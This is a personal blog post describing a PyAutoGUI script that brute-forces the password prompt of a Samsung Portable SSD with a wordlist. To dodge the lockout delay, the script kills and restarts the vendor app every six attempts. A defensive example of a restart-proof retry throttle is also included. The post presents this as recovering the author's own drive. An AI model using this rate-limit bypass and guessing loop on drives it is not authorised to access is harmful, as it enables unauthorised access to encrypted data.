Tuesday, August 9, 2016

Automatic GUI Password Dictionary Attack Using PyAutoGui

I had a Samsung Portable SSD that has hardware encryption. You need a separate driver app to recognize it being inserted into USB, and then it automatically starts up the password prompt for you to log in.

After some researching and prodding, there didn't seem to be any way to log in over the command line, so I was restricted to typing the text at the password prompt. boooooo. I couldn't even copy and paste into the window, so I had to manually type every character. I decided to look into GUI automation to see if I could create a script that would automatically click and type for me. I found PyAutoGUI from Google and Automate the Boring Stuff and decided to implement it. The script is actually extremely simple:

#!/usr/local/bin/python3
import time
import pyautogui
import os

passwords = ['password1','password2','password3','...']
count = 0
time.sleep(5) #give you time to click inside the app
#raw string so the shell-escaped spaces (\ ) reach the shell unchanged
samsung_drive_cmd = r"/Users/USERNAMEHERE/Library/Application\ Support/PortableSSD/Samsung\ Portable\ SSD.app/Contents/MacOS/Samsung\ Portable\ SSD &"

for pwd in passwords:
  if count >= 6 * 2: #6 attempts at 2 seconds each: restart the app
    os.system("killall 'Samsung Portable SSD'")
    os.system(samsung_drive_cmd)
    count = 0
    time.sleep(4)
  print("Trying %s" % pwd)
  pyautogui.moveTo(640, 405) #move to text box to enter password
  pyautogui.typewrite(pwd, interval=0.1) #enter password with .1s wait in between chars
  pyautogui.moveTo(670, 539) #move to "login" and click
  pyautogui.click() 
  count += 2 #every password attempt seems to add 2 seconds internally as a wait counter
  time.sleep(count)

The if statement inside the for loop kills the app and restarts it after 6 password tries, which resets the application's internal counter. There is no reason to wait 20 seconds to enter the next password when you can just kill the app and start again with a fresh timer in 4 seconds.
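The restart works because the retry delay lives only in the app's process memory. As an added example (not code from this post or from Samsung), here is a retry throttle whose state survives a restart; the class name, the state file and the MAX_DELAY cap are assumptions, and the file stands in for storage the host cannot reset, such as the drive's own controller.

```python
import json
import os
import tempfile

BASE_DELAY = 2    # seconds added per failed attempt, as observed in the post
MAX_DELAY = 3600  # assumed upper bound on the enforced wait


class PersistentThrottle:
    """Failed-attempt state kept outside process memory."""

    def __init__(self, state_path):
        self.state_path = state_path

    def _load(self):
        try:
            with open(self.state_path) as fh:
                return json.load(fh)
        except FileNotFoundError:
            # First use only; corrupt state raises instead of silently resetting.
            return {"failures": 0, "last_failure": 0.0}

    def _save(self, state):
        # Write to a temp file and rename, so killing the process mid-write
        # cannot truncate the counter.
        directory = os.path.dirname(os.path.abspath(self.state_path))
        fd, tmp = tempfile.mkstemp(dir=directory)
        with os.fdopen(fd, "w") as fh:
            json.dump(state, fh)
        os.replace(tmp, self.state_path)

    def seconds_until_allowed(self, now):
        """Remaining wait before the next attempt may be checked."""
        state = self._load()
        delay = min(BASE_DELAY * state["failures"], MAX_DELAY)
        return max(0.0, state["last_failure"] + delay - now)

    def record_failure(self, now):
        # Persist before reporting the failure to the caller.
        state = self._load()
        state["failures"] += 1
        state["last_failure"] = now
        self._save(state)

    def record_success(self):
        self._save({"failures": 0, "last_failure": 0.0})
```

A new PersistentThrottle object pointed at the same state still reports the remaining wait, so killing and relaunching the front end gains nothing.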


Generate your password list using JTR (John the Ripper), format it into a list, and let it run overnight. You can't really use your computer while this is running.

UPDATE:
I changed up my code a little bit to be more reliable, read the passwords from a file, detect when the password is correct, and die at that time. Here is the updated and better code:

#!/usr/local/bin/python3
import time
import pyautogui
import os
import subprocess

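#read one candidate password per line; the file is closed when the block ends
with open('wordlist.txt','r') as wordlist:
  passwords = wordlist.read().splitlines()

count = 0
time.sleep(5) #give you time to click inside the app
#raw string so the shell-escaped spaces (\ ) reach the shell unchanged
samsung_drive_cmd = r"/Users/USERNAMEHERE/Library/Application\ Support/PortableSSD/Samsung\ Portable\ SSD.app/Contents/MacOS/Samsung\ Portable\ SSD &"

for pwd in passwords:
  if count >= 6 * 2: #6 attempts at 2 seconds each: restart the app
    os.system("killall 'Samsung Portable SSD'")
    os.system(samsung_drive_cmd)
    count = 0
    time.sleep(4)
  #check_output returns bytes in Python 3, so decode before searching
  mountlist = subprocess.check_output(["mount"]).decode()
  if "Samsung_T1" in mountlist:
    print('THE DRIVE IS MOUNTED')
    break #nothing follows the loop, so the script ends here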
  print("Trying %s" % pwd)
  pyautogui.moveTo(640, 405) #move to text box to enter password
  pyautogui.typewrite(pwd, interval=0.1) #enter password with .1s wait in between chars
  pyautogui.moveTo(670, 539) #move to "login" and click
  pyautogui.click() 
  count += 2 #every password attempt seems to add 2 seconds internally as a wait counter
  time.sleep(count)